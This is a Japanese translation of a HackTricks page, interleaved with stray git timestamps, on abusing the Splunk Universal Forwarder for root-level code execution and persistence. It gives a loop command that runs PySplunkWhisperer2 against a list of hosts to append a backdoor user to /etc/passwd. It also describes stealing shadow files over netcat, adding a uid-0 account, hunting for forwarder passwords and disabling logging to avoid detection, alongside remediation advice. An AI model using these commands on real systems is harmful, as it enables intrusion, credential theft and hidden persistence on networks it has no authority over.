2023-12-31 01:15:16 +00:00
# Splunk LPEと永続性
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-02-03 16:28:32 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > をご覧ください!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-03 16:28:32 +00:00
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
2023-12-31 01:15:16 +00:00
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
2024-02-03 16:28:32 +00:00
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-03 16:28:32 +00:00
**内部**または**外部**でマシンを**列挙**していて、**Splunkが実行中**( ポート8090) を見つけた場合、幸運にも**有効な資格情報**を知っていれば、Splunkサービスを**悪用してシェルを実行**することができます。rootが実行している場合、root権限に昇格することができます。
2022-04-28 16:01:33 +00:00
2024-02-03 16:28:32 +00:00
また、**すでにrootであり、Splunkサービスがlocalhostのみでリスニングしていない場合**は、Splunkサービス**から**パスワードファイルを**盗み**、パスワードを**クラック**するか、新しい資格情報を追加することができます。そして、ホスト上で永続性を維持します。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
以下の最初の画像では、Splunkdウェブページの様子を見ることができます。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
**以下の情報は** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/** ](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ ) からのものです。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
## Splunkフォワーダーを悪用してシェルと永続性を得る
2020-11-06 00:30:40 +00:00
2023-07-07 23:42:27 +00:00
2020年8月14日
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
### 説明: <a href="#description" id="description"></a>
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Splunk Universal Forwarder Agent( UF) は、認証されたリモートユーザーがSplunk APIを通じてエージェントに単一のコマンドまたはスクリプトを送信することを可能にします。UFエージェントは、接続が有効なSplunk Enterpriseサーバーからのものであるかを検証せず、UFエージェントはコードが署名されているか、またはSplunk Enterpriseサーバーからのものであることが証明されているかを検証しません。これにより、UFエージェントのパスワードにアクセスした攻撃者は、オペレーティングシステムに応じてSYSTEMまたはrootとしてサーバー上で任意のコードを実行することができます。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
この攻撃はペネトレーションテスターによって使用されており、悪意のある攻撃者によって野生で積極的に悪用されている可能性があります。パスワードを取得すると、顧客環境の何百ものシステムが危険にさらされる可能性があります。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Splunk UFのパスワードは比較的簡単に取得できます。詳細については、共通パスワードの場所セクションを参照してください。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
### 文脈: <a href="#context" id="context"></a>
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Splunkは、セキュリティ情報およびイベント監視( SIEM) システムとしてよく使用されるデータ集約および検索ツールです。Splunk Enterpriseサーバーはサーバー上で実行されるウェブアプリケーションであり、ネットワーク内のすべてのシステムにインストールされるエージェントであるUniversal Forwardersがあります。SplunkはWindows、Linux、Mac、Unix用のエージェントバイナリを提供しています。多くの組織は、Linux/Unixホストにエージェントをインストールする代わりにSyslogを使用してSplunkにデータを送信しますが、エージェントのインストールはますます人気が高まっています。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Universal Forwarderは、https://host:8089で各ホストでアクセスできます。/service/などの保護されたAPI呼び出しにアクセスすると、基本認証ボックスが表示されます。ユーザー名は常にadminであり、パスワードのデフォルトはchangemeでしたが、2016年にSplunkは新しいインストールに対して8文字以上のパスワードを設定することを要求しました。私のデモで注目すべきは、複雑さは要求されていないことで、私のエージェントのパスワードは12345678です。リモート攻撃者はロックアウトなしでパスワードをブルートフォースすることができます。これはログホストの必要性です。なぜなら、アカウントがロックアウトされた場合、ログはもはやSplunkサーバーに送信されなくなり、攻撃者はこれを使用して自分の攻撃を隠すことができるからです。次のスクリーンショットはUniversal Forwarderエージェントを示しており、この初期ページは認証なしでアクセス可能であり、Splunk Universal Forwarderを実行しているホストを列挙するために使用できます。
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![0 ](https://eapolsniper.github.io/assets/2020AUG14/11\_SplunkAgent.png )
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Splunkのドキュメントは、すべてのエージェントに同じUniversal Forwardingパスワードを使用することを示していますが、私は確かではありませんが、これが要件であるか、または各エージェントに個別のパスワードを設定できるかどうか。しかし、ドキュメントと私がSplunk管理者だったときの記憶に基づいて、私はすべてのエージェントが同じパスワードを使用する必要があると信じています。これは、パスワードが1つのシステムで見つかったりクラックされたりした場合、それがすべてのSplunk UFホストで機能する可能性が高いことを意味します。これは私の個人的な経験であり、迅速に何百ものホストを妥協させることができました。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
### 共通パスワードの場所 <a href="#common-password-locations" id="common-password-locations"></a>
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
私はしばしば、ネットワーク上の以下の場所でSplunk Universal Forwardingエージェントのプレーンテキストパスワードを見つけます:
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
1. Active Directory Sysvol/domain.com/Scriptsディレクトリ。管理者は、効率的なエージェントインストールのために、実行可能ファイルとパスワードを一緒に保存します。
2023-12-31 01:15:16 +00:00
2. ITインストールファイルをホストするネットワークファイル共有
3. 内部ネットワーク上のWikiまたはその他のビルドノ ートリポジトリ
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
パスワードは、WindowsホストのProgram Files\Splunk\etc\passwdおよびLinuxおよびUnixホストの/opt/Splunk/etc/passwdでハッシュ形式でもアクセスできます。攻撃者はHashcatを使用してパスワードをクラックするか、クラウドクラッキング環境を借りてクラックの可能性を高めることができます。パスワードは強力なSHA-256ハッシュであり、そのため強力でランダムなパスワードはクラックされる可能性が低いです。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
### 影響: <a href="#impact" id="impact"></a>
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Splunk Universal Forward Agentのパスワードを持つ攻撃者は、ネットワーク内のすべてのSplunkホストを完全に妥協し、各ホストでSYSTEMまたはrootレベルの権限を取得することができます。私はWindows、Linux、Solaris UnixホストでSplunkエージェントを成功裏に使用しました。この脆弱性により、システムの資格情報がダンプされたり、機密データが外部に流出したり、ランサムウェアがインストールされたりする可能性があります。この脆弱性は迅速で使いやすく、信頼性があります。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
Splunkはログを処理するため、攻撃者は最初に実行されるコマンドでUniversal Forwarderを再構成して、Forwarderの場所を変更し、Splunk SIEMへのログ記録を無効にすることができます。これにより、クライアントのBlue Teamに捕まる可能性が大幅に低下します。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
Splunk Universal Forwarderは、ログ収集のためにドメインコントローラーにインストールされることがよくあります。これにより、攻撃者は簡単にNTDSファイルを抽出したり、さらなる悪用のためにアンチウイルスを無効にしたり、ドメインを変更したりすることができます。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
最後に、Universal Forwarding Agentにはライセンスが必要なく、パスワードでスタンドアロンで構成できます。したがって、攻撃者はUniversal Forwarderをホスト上のバックドア永続性メカニズムとしてインストールできます。これは、Splunkを使用しない顧客であっても、正当なアプリケーションであり、おそらく削除されないでしょう。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
### 証拠: <a href="#evidence" id="evidence"></a>
2024-02-03 16:28:32 +00:00
搾取の例を示すために、私はEnterprise ServerとUniversal Forwardingエージェントの両方に最新のSplunkバージョンを使用してテスト環境を設定しました。このレポートには合計10枚の画像が添付されており、以下を示しています:
2023-12-31 01:15:16 +00:00
1- PySplunkWhisper2を通じて/etc/passwdファイルを要求する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![1 ](https://eapolsniper.github.io/assets/2020AUG14/1\_RequestingPasswd.png )
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
2- Netcatを通じて攻撃者システムに/etc/passwdファイルを受信する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![2 ](https://eapolsniper.github.io/assets/2020AUG14/2\_ReceivingPasswd.png )
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
3- PySplunkWhisper2を通じて/etc/shadowファイルを要求する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![3 ](https://eapolsniper.github.io/assets/2020AUG14/3\_RequestingShadow.png )
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
4- Netcatを通じて攻撃者システムに/etc/shadowファイルを受信する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![4 ](https://eapolsniper.github.io/assets/2020AUG14/4\_ReceivingShadow.png )
2020-11-06 00:30:40 +00:00
2023-07-07 23:42:27 +00:00
5- /etc/passwdファイルにユーザーattacker007を追加する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![5 ](https://eapolsniper.github.io/assets/2020AUG14/5\_AddingUserToPasswd.png )
2020-11-06 00:30:40 +00:00
2023-07-07 23:42:27 +00:00
6- /etc/shadowファイルにユーザーattacker007を追加する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![6 ](https://eapolsniper.github.io/assets/2020AUG14/6\_AddingUserToShadow.png )
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
7- attacker007が正常に追加されたことを示す新しい/etc/shadowファイルを受信する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![7 ](https://eapolsniper.github.io/assets/2020AUG14/7\_ReceivingShadowFileAfterAdd.png )
2020-11-06 00:30:40 +00:00
2023-07-07 23:42:27 +00:00
8- attacker007アカウントを使用して被害者へのSSHアクセスを確認する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![8 ](https://eapolsniper.github.io/assets/2020AUG14/8\_SSHAccessUsingAttacker007.png )
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
9- ユーザー名root007のバックドアrootアカウントを追加し、uid/gidを0に設定する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![9 ](https://eapolsniper.github.io/assets/2020AUG14/9\_AddingBackdoorRootAccount.png )
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
10- attacker007を使用してSSHアクセスを確認し、その後root007を使用してrootに昇格する
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
![10 ](https://eapolsniper.github.io/assets/2020AUG14/10\_EscalatingToRoot.png )
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
この時点で、Splunkと作成した2つのユーザーアカウントの両方を通じてホストへの永続的なアクセスを持っています。そのうちの1つはrootを提供します。私はリモートログを無効にして自分の足跡を隠し、このホストを使用してシステムとネットワークを攻撃し続けることができます。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
PySplunkWhisperer2のスクリプトは非常に簡単で効果的です。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
1. 搾取したいホストのIPを含むファイルを作成します。例えばip.txtという名前です。
2. 次のように実行します:
2020-11-06 00:30:40 +00:00
```bash
for i in `cat ip.txt` ; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
```
2023-12-31 01:15:16 +00:00
ホスト情報:
2020-11-06 00:30:40 +00:00
2021-10-18 11:21:18 +00:00
Splunk Enterprise Server: 192.168.42.114\
Splunk Forwarder Agent Victim: 192.168.42.98\
2023-12-31 01:15:16 +00:00
攻撃者:192.168.42.51
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
Splunk Enterprise バージョン: 8.0.5 (2020年8月12日のラボ設定時点での最新版)\
Universal Forwarder バージョン: 8.0.5 (2020年8月12日のラボ設定時点での最新版)
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
#### Splunk, Incに対する改善推奨事項: <a href="#remediation-recommendations-for-splunk-inc" id="remediation-recommendations-for-splunk-inc"></a>
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
以下のすべての解決策を実装することを推奨します。これにより、防御の深さが提供されます:
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
1. 理想的には、Universal Forwarder エージェントはポートを開放せず、定期的にSplunkサーバーに指示を求めるべきです。
2024-02-03 16:28:32 +00:00
2. クライアントとサーバー間でTLS相互認証を有効にし、各クライアントに個別のキーを使用します。これにより、すべてのSplunkサービス間で非常に高い双方向セキュリティが提供されます。TLS相互認証はエージェントやIoTデバイスで広く実装されており、信頼できるデバイスクライアントからサーバーへの通信の未来です。
2023-12-31 01:15:16 +00:00
3. すべてのコード、単一行、またはスクリプトファイルを、Splunkサーバーによって暗号化および署名された圧縮ファイルで送信します。これはAPIを通じて送信されるエージェントデータを保護するものではありませんが、第三者による悪意のあるリモートコード実行から保護します。
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
#### Splunkの顧客に対する改善推奨事項: <a href="#remediation-recommendations-for-splunk-customers" id="remediation-recommendations-for-splunk-customers"></a>
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
1. Splunkエージェントに非常に強力なパスワードを設定してください。私は少なくとも15文字のランダムパスワードを推奨しますが、これらのパスワードは決して入力されないので、50文字のような非常に長いパスワードに設定することができます。
2. ホストベースのファイアウォールを設定して、Splunkサーバーからの8089/TCPポート( Universal Forwarder Agentのポート) への接続のみを許可します。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
### Red Teamに対する推奨事項: <a href="#recommendations-for-red-team" id="recommendations-for-red-team"></a>
2020-11-06 00:30:40 +00:00
2024-02-03 16:28:32 +00:00
1. 各オペレーティングシステム用のSplunk Universal Forwarderのコピーをダウンロードしてください。これは優れた軽量で署名されたインプラントです。Splunkが実際にこれを修正する場合に備えて、コピーを保持しておくと良いでしょう。
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
### 他の研究者からのエクスプロイト/ブログ <a href="#exploitsblogs-from-other-researchers" id="exploitsblogs-from-other-researchers"></a>
2020-11-06 00:30:40 +00:00
2023-12-31 01:15:16 +00:00
利用可能な公開エクスプロイト:
2020-11-06 00:30:40 +00:00
* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
* https://www.exploit-db.com/exploits/46238
* https://www.exploit-db.com/exploits/46487
2023-12-31 01:15:16 +00:00
関連するブログ投稿:
2020-11-06 00:30:40 +00:00
* https://clement.notin.org/blog/2019/02/25/Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2/
* https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2
* https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool
2024-02-03 16:28:32 +00:00
_\*\* 注意: \*\*_ この問題はSplunkシステムにとって深刻な問題であり、他のテスターによって何年にもわたって悪用されてきました。Splunk Universal Forwarderのリモートコード実行は意図された機能ですが、その実装は危険です。私はこのバグをSplunkのバグ報奨金プログラムに提出しようとしましたが、非常に彼らが設計の意図を認識していない可能性が低いためですが、バグ報告はBug Crowd/Splunk開示ポリシーに従う必要があり、Splunkの許可なしには脆弱性の詳細を公に議論することは_決して_できないと通知されました。私は90日間の開示タイムラインを要求しましたが、拒否されました。そのため、私はこの問題を責任を持って開示しませんでした。なぜなら、Splunkは問題を認識しており、無視を選択していると合理的に確信しており、これが企業に深刻な影響を与える可能性があると感じ、情報セキュリティコミュニティが企業を教育する責任があると考えたからです。
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
## Splunkクエリの悪用
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
情報元 [https://blog.hrncirik.net/cve-2023-46214-analysis ](https://blog.hrncirik.net/cve-2023-46214-analysis )
2022-04-28 16:01:33 +00:00
2024-02-03 16:28:32 +00:00
**CVE-2023-46214** は任意のスクリプトを ** `$SPLUNK_HOME/bin/scripts` ** にアップロードすることを可能にし、その後、検索クエリ ** `|runshellscript script_name.sh` ** を使用してそこに保存された **スクリプト** を **実行** する方法を説明しました:
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
< figure > < img src = "../../.gitbook/assets/image (721).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-02-03 16:28:32 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > こちら< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2023-12-31 01:15:16 +00:00
* **HackTricksに広告を掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手してください。
2024-02-03 16:28:32 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見してください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です。
2023-12-31 01:15:16 +00:00
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )で**フォロー**してください。
2024-02-03 16:28:32 +00:00
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
2022-04-28 16:01:33 +00:00
< / details >